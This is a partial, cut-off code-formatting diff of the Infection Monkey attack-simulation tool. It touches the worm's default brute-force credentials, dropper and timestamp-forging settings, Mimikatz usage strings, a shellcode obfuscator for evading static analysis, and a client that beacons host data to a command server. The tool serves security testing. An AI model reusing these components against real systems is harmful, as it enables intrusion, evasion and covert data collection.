"ScoutSuite found issues related to users' authentication.", - STATUS_PASSED: "ScoutSuite found no issues related to users' authentication." 
+ STATUS_PASSED: "ScoutSuite found no issues related to users' authentication.", }, PRINCIPLE_KEY: PRINCIPLE_SECURE_AUTHENTICATION, PILLARS_KEY: [PEOPLE, WORKLOADS], - POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED] + POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED], }, TEST_SCOUTSUITE_RESTRICTIVE_POLICIES: { TEST_EXPLANATION_KEY: "ScoutSuite searched for permissive user access policies.", FINDING_EXPLANATION_BY_STATUS_KEY: { STATUS_FAILED: "ScoutSuite found permissive user access policies.", - STATUS_PASSED: "ScoutSuite found no issues related to user access policies." + STATUS_PASSED: "ScoutSuite found no issues related to user access policies.", }, PRINCIPLE_KEY: PRINCIPLE_USERS_MAC_POLICIES, PILLARS_KEY: [PEOPLE, WORKLOADS], - POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED] + POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED], }, TEST_SCOUTSUITE_LOGGING: { TEST_EXPLANATION_KEY: "ScoutSuite searched for issues, related to logging.", FINDING_EXPLANATION_BY_STATUS_KEY: { STATUS_FAILED: "ScoutSuite found logging issues.", - STATUS_PASSED: "ScoutSuite found no logging issues." + STATUS_PASSED: "ScoutSuite found no logging issues.", }, PRINCIPLE_KEY: PRINCIPLE_MONITORING_AND_LOGGING, PILLARS_KEY: [AUTOMATION_ORCHESTRATION, VISIBILITY_ANALYTICS], - POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED] + POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED], }, TEST_SCOUTSUITE_SERVICE_SECURITY: { TEST_EXPLANATION_KEY: "ScoutSuite searched for service security issues.", FINDING_EXPLANATION_BY_STATUS_KEY: { STATUS_FAILED: "ScoutSuite found service security issues.", - STATUS_PASSED: "ScoutSuite found no service security issues." 
+ STATUS_PASSED: "ScoutSuite found no service security issues.", }, PRINCIPLE_KEY: PRINCIPLE_MONITORING_AND_LOGGING, PILLARS_KEY: [DEVICES, NETWORKS], - POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED] - } + POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED], + }, } EVENT_TYPE_MONKEY_NETWORK = "monkey_network" @@ -282,7 +290,7 @@ PILLARS_TO_TESTS = { DEVICES: [], WORKLOADS: [], VISIBILITY_ANALYTICS: [], - AUTOMATION_ORCHESTRATION: [] + AUTOMATION_ORCHESTRATION: [], } PRINCIPLES_TO_TESTS = {} diff --git a/monkey/common/config_value_paths.py b/monkey/common/config_value_paths.py index 5ddbe8605..4fc94ea4e 100644 --- a/monkey/common/config_value_paths.py +++ b/monkey/common/config_value_paths.py @@ -1,13 +1,13 @@ -AWS_KEYS_PATH = ['internal', 'monkey', 'aws_keys'] -STARTED_ON_ISLAND_PATH = ['internal', 'general', 'started_on_island'] -EXPORT_MONKEY_TELEMS_PATH = ['internal', 'testing', 'export_monkey_telems'] -CURRENT_SERVER_PATH = ['internal', 'island_server', 'current_server'] -SSH_KEYS_PATH = ['internal', 'exploits', 'exploit_ssh_keys'] -INACCESSIBLE_SUBNETS_PATH = ['basic_network', 'network_analysis', 'inaccessible_subnets'] -USER_LIST_PATH = ['basic', 'credentials', 'exploit_user_list'] -PASSWORD_LIST_PATH = ['basic', 'credentials', 'exploit_password_list'] -EXPLOITER_CLASSES_PATH = ['basic', 'exploiters', 'exploiter_classes'] -SUBNET_SCAN_LIST_PATH = ['basic_network', 'scope', 'subnet_scan_list'] -LOCAL_NETWORK_SCAN_PATH = ['basic_network', 'scope', 'local_network_scan'] -LM_HASH_LIST_PATH = ['internal', 'exploits', 'exploit_lm_hash_list'] -NTLM_HASH_LIST_PATH = ['internal', 'exploits', 'exploit_ntlm_hash_list'] +AWS_KEYS_PATH = ["internal", "monkey", "aws_keys"] +STARTED_ON_ISLAND_PATH = ["internal", "general", "started_on_island"] +EXPORT_MONKEY_TELEMS_PATH = ["internal", "testing", "export_monkey_telems"] +CURRENT_SERVER_PATH = ["internal", "island_server", "current_server"] +SSH_KEYS_PATH = ["internal", "exploits", "exploit_ssh_keys"] +INACCESSIBLE_SUBNETS_PATH = ["basic_network", "network_analysis", "inaccessible_subnets"] +USER_LIST_PATH = ["basic", "credentials", "exploit_user_list"] +PASSWORD_LIST_PATH = ["basic", "credentials", "exploit_password_list"] +EXPLOITER_CLASSES_PATH = ["basic", "exploiters", "exploiter_classes"] +SUBNET_SCAN_LIST_PATH = ["basic_network", "scope", "subnet_scan_list"] +LOCAL_NETWORK_SCAN_PATH = ["basic_network", "scope", "local_network_scan"] +LM_HASH_LIST_PATH = ["internal", "exploits", "exploit_lm_hash_list"] +NTLM_HASH_LIST_PATH = ["internal", "exploits", "exploit_ntlm_hash_list"] diff --git a/monkey/common/network/__init__.py b/monkey/common/network/__init__.py index ee5b79ad0..a44473084 100644 --- a/monkey/common/network/__init__.py +++ b/monkey/common/network/__init__.py @@ -1 +1 @@ -__author__ = 'itay.mizeretz' +__author__ = "itay.mizeretz" diff --git a/monkey/common/network/network_range.py b/monkey/common/network/network_range.py index 7eb082c8f..581c4bf77 100644 --- a/monkey/common/network/network_range.py +++ b/monkey/common/network/network_range.py @@ -5,7 +5,7 @@ import socket import struct from abc import ABCMeta, abstractmethod -__author__ = 'itamar' +__author__ = "itamar" LOG = logging.getLogger(__name__) @@ -48,14 +48,14 @@ class NetworkRange(object, metaclass=ABCMeta): address_str = address_str.strip() if NetworkRange.check_if_range(address_str): return IpRange(ip_range=address_str) - if -1 != address_str.find('/'): + if -1 != address_str.find("/"): return CidrRange(cidr_range=address_str) 
return SingleIpRange(ip_address=address_str) @staticmethod def check_if_range(address_str): - if -1 != address_str.find('-'): - ips = address_str.split('-') + if -1 != address_str.find("-"): + ips = address_str.split("-") try: ipaddress.ip_address(ips[0]) and ipaddress.ip_address(ips[1]) except ValueError: @@ -85,28 +85,36 @@ class CidrRange(NetworkRange): return ipaddress.ip_address(ip_address) in self._ip_network def _get_range(self): - return [CidrRange._ip_to_number(str(x)) for x in self._ip_network if x != self._ip_network.broadcast_address] + return [ + CidrRange._ip_to_number(str(x)) + for x in self._ip_network + if x != self._ip_network.broadcast_address + ] class IpRange(NetworkRange): def __init__(self, ip_range=None, lower_end_ip=None, higher_end_ip=None, shuffle=True): super(IpRange, self).__init__(shuffle=shuffle) if ip_range is not None: - addresses = ip_range.split('-') + addresses = ip_range.split("-") if len(addresses) != 2: - raise ValueError('Illegal IP range format: %s. Format is 192.168.0.5-192.168.0.20' % ip_range) + raise ValueError( + "Illegal IP range format: %s. Format is 192.168.0.5-192.168.0.20" % ip_range + ) self._lower_end_ip, self._higher_end_ip = [x.strip() for x in addresses] elif (lower_end_ip is not None) and (higher_end_ip is not None): self._lower_end_ip = lower_end_ip.strip() self._higher_end_ip = higher_end_ip.strip() else: - raise ValueError('Illegal IP range: %s' % ip_range) + raise ValueError("Illegal IP range: %s" % ip_range) self._lower_end_ip_num = self._ip_to_number(self._lower_end_ip) self._higher_end_ip_num = self._ip_to_number(self._higher_end_ip) if self._higher_end_ip_num < self._lower_end_ip_num: raise ValueError( - 'Higher end IP %s is smaller than lower end IP %s' % (self._lower_end_ip, self._higher_end_ip)) + "Higher end IP %s is smaller than lower end IP %s" + % (self._lower_end_ip, self._higher_end_ip) + ) def __repr__(self): return "<IpRange %s-%s>" % (self._lower_end_ip, self._higher_end_ip) @@ -156,7 +164,7 @@ class SingleIpRange(NetworkRange): :return: A tuple in format (IP, domain_name). Eg. 
(192.168.55.1, www.google.com) """ # The most common use case is to enter ip/range into "Scan IP/subnet list" - domain_name = '' + domain_name = "" # Try casting user's input as IP try: @@ -167,8 +175,10 @@ class SingleIpRange(NetworkRange): ip = socket.gethostbyname(string_) domain_name = string_ except socket.error: - LOG.error("Your specified host: {} is not found as a domain name and" - " it's not an IP address".format(string_)) + LOG.error( + "Your specified host: {} is not found as a domain name and" + " it's not an IP address".format(string_) + ) return None, string_ # If a string_ was entered instead of IP we presume that it was domain name and translate it return ip, domain_name diff --git a/monkey/common/network/network_utils.py b/monkey/common/network/network_utils.py index eaa2bc195..6aa5076ae 100644 --- a/monkey/common/network/network_utils.py +++ b/monkey/common/network/network_utils.py @@ -15,6 +15,6 @@ def get_host_from_network_location(network_location: str) -> str: def remove_port(url): parsed = urlparse(url) - with_port = f'{parsed.scheme}://{parsed.netloc}' - without_port = re.sub(':[0-9]+(?=$|/)', '', with_port) + with_port = f"{parsed.scheme}://{parsed.netloc}" + without_port = re.sub(":[0-9]+(?=$|/)", "", with_port) return without_port diff --git a/monkey/common/network/test_network_utils.py b/monkey/common/network/test_network_utils.py index 396bc1c0a..0376cd6d5 100644 --- a/monkey/common/network/test_network_utils.py +++ b/monkey/common/network/test_network_utils.py @@ -12,6 +12,6 @@ class TestNetworkUtils(TestCase): assert get_host_from_network_location("user:password@host:8080") == "host" def test_remove_port_from_url(self): - assert remove_port('https://google.com:80') == 'https://google.com' - assert remove_port('https://8.8.8.8:65336') == 'https://8.8.8.8' - assert remove_port('ftp://ftpserver.com:21/hello/world') == 'ftp://ftpserver.com' + assert remove_port("https://google.com:80") == "https://google.com" + assert remove_port("https://8.8.8.8:65336") == "https://8.8.8.8" + assert remove_port("ftp://ftpserver.com:21/hello/world") == "ftp://ftpserver.com" diff --git a/monkey/common/network/test_segmentation_utils.py b/monkey/common/network/test_segmentation_utils.py index 1bb3d0484..c4728f982 100644 --- a/monkey/common/network/test_segmentation_utils.py +++ b/monkey/common/network/test_segmentation_utils.py @@ -8,21 +8,13 @@ class TestSegmentationUtils: target = CidrRange("2.2.2.0/24") # IP not in both - assert get_ip_in_src_and_not_in_dst( - ["3.3.3.3", "4.4.4.4"], source, target - ) is None + assert get_ip_in_src_and_not_in_dst(["3.3.3.3", "4.4.4.4"], source, target) is None # IP not in source, in target - assert (get_ip_in_src_and_not_in_dst( - ["2.2.2.2"], source, target - )) is None + assert (get_ip_in_src_and_not_in_dst(["2.2.2.2"], source, target)) is None # IP in source, not in target - assert (get_ip_in_src_and_not_in_dst( - ["8.8.8.8", "1.1.1.1"], source, target - )) + assert get_ip_in_src_and_not_in_dst(["8.8.8.8", "1.1.1.1"], source, target) # IP in both subnets - assert (get_ip_in_src_and_not_in_dst( - ["8.8.8.8", "1.1.1.1"], source, source - )) is None + assert (get_ip_in_src_and_not_in_dst(["8.8.8.8", "1.1.1.1"], source, source)) is None diff --git a/monkey/common/utils/attack_utils.py b/monkey/common/utils/attack_utils.py index 0eadbedcc..c911ed780 100644 --- a/monkey/common/utils/attack_utils.py +++ b/monkey/common/utils/attack_utils.py @@ -13,17 +13,29 @@ class ScanStatus(Enum): class UsageEnum(Enum): - SMB = {ScanStatus.USED.value: "SMB 
exploiter ran the monkey by creating a service via MS-SCMR.", - ScanStatus.SCANNED.value: "SMB exploiter failed to run the monkey by creating a service via MS-SCMR."} - MIMIKATZ = {ScanStatus.USED.value: "Windows module loader was used to load Mimikatz DLL.", - ScanStatus.SCANNED.value: "Monkey tried to load Mimikatz DLL, but failed."} - MIMIKATZ_WINAPI = {ScanStatus.USED.value: "WinAPI was called to load mimikatz.", - ScanStatus.SCANNED.value: "Monkey tried to call WinAPI to load mimikatz."} - DROPPER = {ScanStatus.USED.value: "WinAPI was used to mark monkey files for deletion on next boot."} - SINGLETON_WINAPI = {ScanStatus.USED.value: "WinAPI was called to acquire system singleton for monkey's process.", - ScanStatus.SCANNED.value: "WinAPI call to acquire system singleton" - " for monkey process wasn't successful."} - DROPPER_WINAPI = {ScanStatus.USED.value: "WinAPI was used to mark monkey files for deletion on next boot."} + SMB = { + ScanStatus.USED.value: "SMB exploiter ran the monkey by creating a service via MS-SCMR.", + ScanStatus.SCANNED.value: "SMB exploiter failed to run the monkey by creating a service via MS-SCMR.", + } + MIMIKATZ = { + ScanStatus.USED.value: "Windows module loader was used to load Mimikatz DLL.", + ScanStatus.SCANNED.value: "Monkey tried to load Mimikatz DLL, but failed.", + } + MIMIKATZ_WINAPI = { + ScanStatus.USED.value: "WinAPI was called to load mimikatz.", + ScanStatus.SCANNED.value: "Monkey tried to call WinAPI to load mimikatz.", + } + DROPPER = { + ScanStatus.USED.value: "WinAPI was used to mark monkey files for deletion on next boot." + } + SINGLETON_WINAPI = { + ScanStatus.USED.value: "WinAPI was called to acquire system singleton for monkey's process.", + ScanStatus.SCANNED.value: "WinAPI call to acquire system singleton" + " for monkey process wasn't successful.", + } + DROPPER_WINAPI = { + ScanStatus.USED.value: "WinAPI was used to mark monkey files for deletion on next boot." + } # Dict that describes what BITS job was used for @@ -31,8 +43,10 @@ BITS_UPLOAD_STRING = "BITS job was used to upload monkey to a remote system." def format_time(time): - return "%s-%s %s:%s:%s" % (time.date().month, - time.date().day, - time.time().hour, - time.time().minute, - time.time().second) + return "%s-%s %s:%s:%s" % ( + time.date().month, + time.date().day, + time.time().hour, + time.time().minute, + time.time().second, + ) diff --git a/monkey/common/utils/mongo_utils.py b/monkey/common/utils/mongo_utils.py index 6d784d7ac..a76548738 100644 --- a/monkey/common/utils/mongo_utils.py +++ b/monkey/common/utils/mongo_utils.py @@ -1,14 +1,13 @@ import sys -if sys.platform == 'win32': +if sys.platform == "win32": import win32com import wmi -__author__ = 'maor.rayzin' +__author__ = "maor.rayzin" class MongoUtils: - def __init__(self): # Static class pass @@ -35,7 +34,10 @@ class MongoUtils: try: # objectSid property of ds_user is problematic and need this special treatment. # ISWbemObjectEx interface. Class Uint8Array ? 
- if str(o._oleobj_.GetTypeInfo().GetTypeAttr().iid) == "{269AD56A-8A67-4129-BC8C-0506DCFE9880}": + if ( + str(o._oleobj_.GetTypeInfo().GetTypeAttr().iid) + == "{269AD56A-8A67-4129-BC8C-0506DCFE9880}" + ): return o.Value except Exception: pass diff --git a/monkey/common/utils/shellcode_obfuscator.py b/monkey/common/utils/shellcode_obfuscator.py index 4e4c2ed3d..11635201e 100644 --- a/monkey/common/utils/shellcode_obfuscator.py +++ b/monkey/common/utils/shellcode_obfuscator.py @@ -9,8 +9,8 @@ from Crypto.Cipher import AES # noqa: DUO133 # nosec: B413 # We only encrypt payloads to hide them from static analysis # it's OK to have these keys plaintext -KEY = b'1234567890123456' -NONCE = b'\x93n2\xbc\xf5\x8d:\xc2fP\xabn\x02\xb3\x17f' +KEY = b"1234567890123456" +NONCE = b"\x93n2\xbc\xf5\x8d:\xc2fP\xabn\x02\xb3\x17f" # Use this manually to get obfuscated bytes of shellcode diff --git a/monkey/common/utils/test_shellcode_obfuscator.py b/monkey/common/utils/test_shellcode_obfuscator.py index 7116993f2..bda9f7996 100644 --- a/monkey/common/utils/test_shellcode_obfuscator.py +++ b/monkey/common/utils/test_shellcode_obfuscator.py @@ -2,12 +2,11 @@ from unittest import TestCase from common.utils.shellcode_obfuscator import clarify, obfuscate -SHELLCODE = b'1234567890abcd' -OBFUSCATED_SHELLCODE = b'\xc7T\x9a\xf4\xb1cn\x94\xb0X\xf2\xfb^=' +SHELLCODE = b"1234567890abcd" +OBFUSCATED_SHELLCODE = b"\xc7T\x9a\xf4\xb1cn\x94\xb0X\xf2\xfb^=" class TestShellcodeObfuscator(TestCase): - def test_obfuscate(self): assert obfuscate(SHELLCODE) == OBFUSCATED_SHELLCODE diff --git a/monkey/common/utils/wmi_utils.py b/monkey/common/utils/wmi_utils.py index fc82663cb..9b94f90ca 100644 --- a/monkey/common/utils/wmi_utils.py +++ b/monkey/common/utils/wmi_utils.py @@ -8,11 +8,10 @@ if sys.platform.startswith("win"): from .mongo_utils import MongoUtils -__author__ = 'maor.rayzin' +__author__ = "maor.rayzin" class WMIUtils: - def __init__(self): # Static class pass diff --git a/monkey/common/version.py b/monkey/common/version.py index 5e8dd4bf4..4070fc2f6 100644 --- a/monkey/common/version.py +++ b/monkey/common/version.py @@ -16,10 +16,12 @@ def get_version(build=BUILD): def print_version(): parser = argparse.ArgumentParser() - parser.add_argument("-b", "--build", default=BUILD, help="Choose the build string for this version.", type=str) + parser.add_argument( + "-b", "--build", default=BUILD, help="Choose the build string for this version.", type=str + ) args = parser.parse_args() print(get_version(args.build)) -if __name__ == '__main__': +if __name__ == "__main__": print_version() diff --git a/monkey/infection_monkey/__init__.py b/monkey/infection_monkey/__init__.py index ee5b79ad0..a44473084 100644 --- a/monkey/infection_monkey/__init__.py +++ b/monkey/infection_monkey/__init__.py @@ -1 +1 @@ -__author__ = 'itay.mizeretz' +__author__ = "itay.mizeretz" diff --git a/monkey/infection_monkey/config.py b/monkey/infection_monkey/config.py index 6529ade86..7aeaccee2 100644 --- a/monkey/infection_monkey/config.py +++ b/monkey/infection_monkey/config.py @@ -5,14 +5,19 @@ import uuid from abc import ABCMeta from itertools import product -__author__ = 'itamar' +__author__ = "itamar" GUID = str(uuid.getnode()) -EXTERNAL_CONFIG_FILE = os.path.join(os.path.abspath(os.path.dirname(sys.argv[0])), 'monkey.bin') +EXTERNAL_CONFIG_FILE = os.path.join(os.path.abspath(os.path.dirname(sys.argv[0])), "monkey.bin") -SENSITIVE_FIELDS = ["exploit_password_list", "exploit_user_list", "exploit_ssh_keys", "aws_secret_access_key", - "aws_session_token"] 
+SENSITIVE_FIELDS = [ + "exploit_password_list", + "exploit_user_list", + "exploit_ssh_keys", + "aws_secret_access_key", + "aws_session_token", +] LOCAL_CONFIG_VARS = ["name", "id", "current_server", "max_depth"] HIDDEN_FIELD_REPLACEMENT_CONTENT = "hidden" @@ -21,7 +26,7 @@ class Configuration(object): def from_kv(self, formatted_data): unknown_items = [] for key, value in list(formatted_data.items()): - if key.startswith('_'): + if key.startswith("_"): continue if key in LOCAL_CONFIG_VARS: continue @@ -45,7 +50,7 @@ class Configuration(object): def as_dict(self): result = {} for key in dir(Configuration): - if key.startswith('_'): + if key.startswith("_"): continue try: value = getattr(self, key) @@ -75,10 +80,10 @@ class Configuration(object): ########################### use_file_logging = True - dropper_log_path_windows = '%temp%\\~df1562.tmp' - dropper_log_path_linux = '/tmp/user-1562' - monkey_log_path_windows = '%temp%\\~df1563.tmp' - monkey_log_path_linux = '/tmp/user-1563' + dropper_log_path_windows = "%temp%\\~df1562.tmp" + dropper_log_path_linux = "/tmp/user-1562" + monkey_log_path_windows = "%temp%\\~df1563.tmp" + monkey_log_path_linux = "/tmp/user-1563" send_log_to_server = True ########################### @@ -88,16 +93,16 @@ class Configuration(object): dropper_try_move_first = True dropper_set_date = True dropper_date_reference_path_windows = r"%windir%\system32\kernel32.dll" - dropper_date_reference_path_linux = '/bin/sh' + dropper_date_reference_path_linux = "/bin/sh" dropper_target_path_win_32 = r"C:\Windows\temp\monkey32.exe" dropper_target_path_win_64 = r"C:\Windows\temp\monkey64.exe" - dropper_target_path_linux = '/tmp/monkey' + dropper_target_path_linux = "/tmp/monkey" ########################### # Kill file ########################### - kill_file_path_windows = '%windir%\\monkey.not' - kill_file_path_linux = '/var/run/monkey.not' + kill_file_path_windows = "%windir%\\monkey.not" + kill_file_path_linux = "/var/run/monkey.not" ########################### # monkey config @@ -134,9 +139,7 @@ class Configuration(object): current_server = "" # Configuration servers to try to connect to, in this order. 
- command_servers = [ - "192.0.2.0:5000" - ] + command_servers = ["192.0.2.0:5000"] # sets whether or not to locally save the running configuration after finishing serialize_config = False @@ -150,7 +153,7 @@ class Configuration(object): keep_tunnel_open_time = 60 # Monkey files directory name - monkey_dir_name = 'monkey_dir' + monkey_dir_name = "monkey_dir" ########################### # scanners config @@ -165,22 +168,14 @@ class Configuration(object): blocked_ips = [] # TCP Scanner - HTTP_PORTS = [80, 8080, 443, - 8008, # HTTP alternate - 7001 # Oracle Weblogic default server port - ] - tcp_target_ports = [22, - 2222, - 445, - 135, - 3389, - 80, - 8080, - 443, - 8008, - 3306, - 9200, - 5432] + HTTP_PORTS = [ + 80, + 8080, + 443, + 8008, # HTTP alternate + 7001, # Oracle Weblogic default server port + ] + tcp_target_ports = [22, 2222, 445, 135, 3389, 80, 8080, 443, 8008, 3306, 9200, 5432] tcp_target_ports.extend(HTTP_PORTS) tcp_scan_timeout = 3000 # 3000 Milliseconds tcp_scan_interval = 0 # in milliseconds @@ -221,11 +216,11 @@ class Configuration(object): :return: """ cred_list = [] - for cred in product(self.exploit_user_list, self.exploit_password_list, [''], ['']): + for cred in product(self.exploit_user_list, self.exploit_password_list, [""], [""]): cred_list.append(cred) - for cred in product(self.exploit_user_list, [''], [''], self.exploit_ntlm_hash_list): + for cred in product(self.exploit_user_list, [""], [""], self.exploit_ntlm_hash_list): cred_list.append(cred) - for cred in product(self.exploit_user_list, [''], self.exploit_lm_hash_list, ['']): + for cred in product(self.exploit_user_list, [""], self.exploit_lm_hash_list, [""]): cred_list.append(cred) return cred_list @@ -241,15 +236,15 @@ class Configuration(object): password_hashed = hashlib.sha512(sensitive_data.encode()).hexdigest() return password_hashed - exploit_user_list = ['Administrator', 'root', 'user'] + exploit_user_list = ["Administrator", "root", "user"] exploit_password_list = ["Password1!", "1234", "password", "12345678"] exploit_lm_hash_list = [] exploit_ntlm_hash_list = [] exploit_ssh_keys = [] - aws_access_key_id = '' - aws_secret_access_key = '' - aws_session_token = '' + aws_access_key_id = "" + aws_secret_access_key = "" + aws_session_token = "" # smb/wmi exploiter smb_download_timeout = 300 # timeout in seconds @@ -258,7 +253,16 @@ class Configuration(object): # Timeout (in seconds) for sambacry's trigger to yield results. sambacry_trigger_timeout = 5 # Folder paths to guess share lies inside. - sambacry_folder_paths_to_guess = ['/', '/mnt', '/tmp', '/storage', '/export', '/share', '/shares', '/home'] + sambacry_folder_paths_to_guess = [ + "/", + "/mnt", + "/tmp", + "/storage", + "/export", + "/share", + "/shares", + "/home", + ] # Shares to not check if they're writable. 
sambacry_shares_not_to_check = ["IPC$", "print$"] diff --git a/monkey/infection_monkey/control.py b/monkey/infection_monkey/control.py index 611166afa..19428b17a 100644 --- a/monkey/infection_monkey/control.py +++ b/monkey/infection_monkey/control.py @@ -9,9 +9,11 @@ from requests.exceptions import ConnectionError import infection_monkey.monkeyfs as monkeyfs import infection_monkey.tunnel as tunnel -from common.common_consts.timeouts import (LONG_REQUEST_TIMEOUT, - MEDIUM_REQUEST_TIMEOUT, - SHORT_REQUEST_TIMEOUT) +from common.common_consts.timeouts import ( + LONG_REQUEST_TIMEOUT, + MEDIUM_REQUEST_TIMEOUT, + SHORT_REQUEST_TIMEOUT, +) from common.common_consts.api_url_consts import T1216_PBA_FILE_DOWNLOAD_PATH from infection_monkey.config import GUID, WormConfiguration from infection_monkey.network.info import check_internet_access, local_ips @@ -19,7 +21,7 @@ from infection_monkey.transport.http import HTTPConnectProxy from infection_monkey.transport.tcp import TcpProxy from infection_monkey.utils.exceptions.planned_shutdown_exception import PlannedShutdownException -__author__ = 'hoffer' +__author__ = "hoffer" requests.packages.urllib3.disable_warnings() @@ -49,27 +51,34 @@ class ControlClient(object): if has_internet_access is None: has_internet_access = check_internet_access(WormConfiguration.internet_services) - monkey = {'guid': GUID, - 'hostname': hostname, - 'ip_addresses': local_ips(), - 'description': " ".join(platform.uname()), - 'internet_access': has_internet_access, - 'config': WormConfiguration.as_dict(), - 'parent': parent} + monkey = { + "guid": GUID, + "hostname": hostname, + "ip_addresses": local_ips(), + "description": " ".join(platform.uname()), + "internet_access": has_internet_access, + "config": WormConfiguration.as_dict(), + "parent": parent, + } if ControlClient.proxies: - monkey['tunnel'] = ControlClient.proxies.get('https') + monkey["tunnel"] = ControlClient.proxies.get("https") - requests.post("https://%s/api/monkey" % (WormConfiguration.current_server,), # noqa: DUO123 - data=json.dumps(monkey), - headers={'content-type': 'application/json'}, - verify=False, - proxies=ControlClient.proxies, - timeout=20) + requests.post( + "https://%s/api/monkey" % (WormConfiguration.current_server,), # noqa: DUO123 + data=json.dumps(monkey), + headers={"content-type": "application/json"}, + verify=False, + proxies=ControlClient.proxies, + timeout=20, + ) @staticmethod def find_server(default_tunnel=None): - LOG.debug("Trying to wake up with Monkey Island servers list: %r" % WormConfiguration.command_servers) + LOG.debug( + "Trying to wake up with Monkey Island servers list: %r" + % WormConfiguration.command_servers + ) if default_tunnel: LOG.debug("default_tunnel: %s" % (default_tunnel,)) @@ -83,10 +92,12 @@ class ControlClient(object): if ControlClient.proxies: debug_message += " through proxies: %s" % ControlClient.proxies LOG.debug(debug_message) - requests.get(f"https://{server}/api?action=is-up", # noqa: DUO123 - verify=False, - proxies=ControlClient.proxies, - timeout=TIMEOUT_IN_SECONDS) + requests.get( + f"https://{server}/api?action=is-up", # noqa: DUO123 + verify=False, + proxies=ControlClient.proxies, + timeout=TIMEOUT_IN_SECONDS, + ) WormConfiguration.current_server = current_server break @@ -105,7 +116,7 @@ class ControlClient(object): if proxy_find: proxy_address, proxy_port = proxy_find LOG.info("Found tunnel at %s:%s" % (proxy_address, proxy_port)) - ControlClient.proxies['https'] = 'https://%s:%s' % (proxy_address, proxy_port) + ControlClient.proxies["https"] = 
"https://%s:%s" % (proxy_address, proxy_port) return ControlClient.find_server() else: LOG.info("No tunnel found") @@ -118,74 +129,97 @@ class ControlClient(object): try: monkey = {} if ControlClient.proxies: - monkey['tunnel'] = ControlClient.proxies.get('https') - requests.patch("https://%s/api/monkey/%s" % (WormConfiguration.current_server, GUID), # noqa: DUO123 - data=json.dumps(monkey), - headers={'content-type': 'application/json'}, - verify=False, - proxies=ControlClient.proxies, - timeout=MEDIUM_REQUEST_TIMEOUT) + monkey["tunnel"] = ControlClient.proxies.get("https") + requests.patch( + "https://%s/api/monkey/%s" + % (WormConfiguration.current_server, GUID), # noqa: DUO123 + data=json.dumps(monkey), + headers={"content-type": "application/json"}, + verify=False, + proxies=ControlClient.proxies, + timeout=MEDIUM_REQUEST_TIMEOUT, + ) except Exception as exc: - LOG.warning("Error connecting to control server %s: %s", - WormConfiguration.current_server, exc) + LOG.warning( + "Error connecting to control server %s: %s", WormConfiguration.current_server, exc + ) return {} @staticmethod def send_telemetry(telem_category, json_data: str): if not WormConfiguration.current_server: - LOG.error("Trying to send %s telemetry before current server is established, aborting." % telem_category) + LOG.error( + "Trying to send %s telemetry before current server is established, aborting." + % telem_category + ) return try: - telemetry = {'monkey_guid': GUID, 'telem_category': telem_category, 'data': json_data} - requests.post("https://%s/api/telemetry" % (WormConfiguration.current_server,), # noqa: DUO123 - data=json.dumps(telemetry), - headers={'content-type': 'application/json'}, - verify=False, - proxies=ControlClient.proxies, - timeout=MEDIUM_REQUEST_TIMEOUT) + telemetry = {"monkey_guid": GUID, "telem_category": telem_category, "data": json_data} + requests.post( + "https://%s/api/telemetry" % (WormConfiguration.current_server,), # noqa: DUO123 + data=json.dumps(telemetry), + headers={"content-type": "application/json"}, + verify=False, + proxies=ControlClient.proxies, + timeout=MEDIUM_REQUEST_TIMEOUT, + ) except Exception as exc: - LOG.warning("Error connecting to control server %s: %s", - WormConfiguration.current_server, exc) + LOG.warning( + "Error connecting to control server %s: %s", WormConfiguration.current_server, exc + ) @staticmethod def send_log(log): if not WormConfiguration.current_server: return try: - telemetry = {'monkey_guid': GUID, 'log': json.dumps(log)} - requests.post("https://%s/api/log" % (WormConfiguration.current_server,), # noqa: DUO123 - data=json.dumps(telemetry), - headers={'content-type': 'application/json'}, - verify=False, - proxies=ControlClient.proxies, - timeout=MEDIUM_REQUEST_TIMEOUT) + telemetry = {"monkey_guid": GUID, "log": json.dumps(log)} + requests.post( + "https://%s/api/log" % (WormConfiguration.current_server,), # noqa: DUO123 + data=json.dumps(telemetry), + headers={"content-type": "application/json"}, + verify=False, + proxies=ControlClient.proxies, + timeout=MEDIUM_REQUEST_TIMEOUT, + ) except Exception as exc: - LOG.warning("Error connecting to control server %s: %s", - WormConfiguration.current_server, exc) + LOG.warning( + "Error connecting to control server %s: %s", WormConfiguration.current_server, exc + ) @staticmethod def load_control_config(): if not WormConfiguration.current_server: return try: - reply = requests.get("https://%s/api/monkey/%s" % (WormConfiguration.current_server, GUID), # noqa: DUO123 - verify=False, - 
proxies=ControlClient.proxies, - timeout=MEDIUM_REQUEST_TIMEOUT) + reply = requests.get( + "https://%s/api/monkey/%s" + % (WormConfiguration.current_server, GUID), # noqa: DUO123 + verify=False, + proxies=ControlClient.proxies, + timeout=MEDIUM_REQUEST_TIMEOUT, + ) except Exception as exc: - LOG.warning("Error connecting to control server %s: %s", - WormConfiguration.current_server, exc) + LOG.warning( + "Error connecting to control server %s: %s", WormConfiguration.current_server, exc + ) return try: - unknown_variables = WormConfiguration.from_kv(reply.json().get('config')) - LOG.info("New configuration was loaded from server: %r" % - (WormConfiguration.hide_sensitive_info(WormConfiguration.as_dict()),)) + unknown_variables = WormConfiguration.from_kv(reply.json().get("config")) + LOG.info( + "New configuration was loaded from server: %r" + % (WormConfiguration.hide_sensitive_info(WormConfiguration.as_dict()),) + ) except Exception as exc: # we don't continue with default conf here because it might be dangerous - LOG.error("Error parsing JSON reply from control server %s (%s): %s", - WormConfiguration.current_server, reply._content, exc) + LOG.error( + "Error parsing JSON reply from control server %s (%s): %s", + WormConfiguration.current_server, + reply._content, + exc, + ) raise Exception("Couldn't load from from server's configuration, aborting. %s" % exc) if unknown_variables: @@ -196,14 +230,19 @@ class ControlClient(object): if not WormConfiguration.current_server: return try: - requests.patch("https://%s/api/monkey/%s" % (WormConfiguration.current_server, GUID), # noqa: DUO123 - data=json.dumps({'config_error': True}), - headers={'content-type': 'application/json'}, - 